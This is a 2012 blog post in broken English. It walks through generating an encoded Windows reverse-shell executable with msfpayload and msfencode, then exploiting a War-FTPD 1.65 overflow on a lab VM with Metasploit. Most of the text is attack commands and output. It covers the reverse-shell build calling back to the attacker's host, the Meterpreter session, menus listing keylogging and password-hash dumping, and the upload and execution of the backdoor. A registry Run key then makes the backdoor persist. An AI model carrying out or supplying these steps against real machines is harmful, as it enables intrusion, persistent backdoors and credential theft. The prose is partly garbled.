Senin, 27 Februari 2012

Msfencode And Msfpayload

Msfencode
Msfpayload shellcode produced by a fully functional, but it contains some null charactersthat, when interpreted by many programs, signaling the end of the string, and this willcause the code to terminate before completion. In other words.


root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > sexy.exe 
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
picure is below

Msfpaylaods
Msfpayload is a component of Metasploit to generate shellcodeexecutablefor use inthe exploitation outside of the FrameworkShellcode can be generated in many formats, including CRubyJavaScriptand even Visual Basic for ApplicationsEach outputformat would be useful in various situations.



example


root@bt:~# msfconsole 

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 14 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306



msf > use exploit/windows/ftp/warftpd_165_user
msf exploit(warftpd_165_user) > search warftp

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/ftp/warftpd_165_pass 1998-03-19 average War-FTPD 1.65 Password Overflow
exploit/windows/ftp/warftpd_165_user 1998-03-19 average War-FTPD 1.65 Username Overflow


msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port

msf exploit(warftpd_165_user) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.56.101 yes The target address
RPORT 21 yes The target port

msf exploit(warftpd_165_user) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http normal Reflective Dll Injection, Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

msf exploit(warftpd_165_user) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.56.101 yes The target address
RPORT 21 yes The target port


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.56.101 yes The target address
RPORT 21 yes The target port


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > show targets

Exploit targets:

Id Name
-- ----
0 Windows 2000 SP0-SP4 English
1 Windows XP SP0-SP1 English
2 Windows XP SP2 English
3 Windows XP SP3 English


msf exploit(warftpd_165_user) > set targets 3
targets => 3
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.56.101 yes The target address
RPORT 21 yes The target port


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.56.101 yes The target address
RPORT 21 yes The target port


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port

msf exploit(warftpd_165_user) > exploit

[-] Exploit failed: A target has not been selected.
msf exploit(warftpd_165_user) > set target 3
target => 3
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.56.101 yes The target address
RPORT 21 yes The target port


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
3 Windows XP SP3 English


msf exploit(warftpd_165_user) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[-] Exploit exception: The connection was refused by the remote host (192.168.56.101:21).
[*] Exploit completed, but no session was created.
msf exploit(warftpd_165_user) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Trying target Windows XP SP3 English...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050) at 2012-02-27 20:27:04 +0700

meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1040 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1104 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1156 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1496 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1600 svchost.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe
1660 explorer.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\Explorer.EXE
1712 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1808 VBoxTray.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\VBoxTray.exe
1816 GrooveMonitor.exe x86 0 WEKO-9B92FC1EF0\weko C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
1828 ctfmon.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\ctfmon.exe
1984 svchost.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe
2136 wscntfy.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wscntfy.exe
3120 wuauclt.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wuauclt.exe
3464 wpabaln.exe x86 0 WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wpabaln.exe
4 System x86 0
4064 war-ftpd.exe x86 0 WEKO-9B92FC1EF0\weko C:\Documents and Settings\weko\My Documents\instaler\war-ftpd.exe
444 AntDS.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntDS.exe
464 AntServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntServer.exe
488 AvServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AvServer.exe
520 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
584 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
608 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
828 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
872 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
948 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

meterpreter > ?

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table


Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components


Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table


Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components


Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

meterpreter > upload /root/sexy.exe c:\\windows\\system32
[*] uploading : /root/sexy.exe -> c:\windows\system32
[*] uploaded : /root/sexy.exe -> c:\windows\system32\sexy.exe
meterpreter > execute -f sexy.exe
Process 3372 created.
meterpreter > execute -f sexy.exe
Process 2816 created.
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\windows\
Successful set start.
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\window
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\run
Name: start
Type: REG_SZ
Data: c:\\windows\\system32\\sexy.exe
meterpreter > reboot
Rebooting...
meterpreter >  

2 komentar: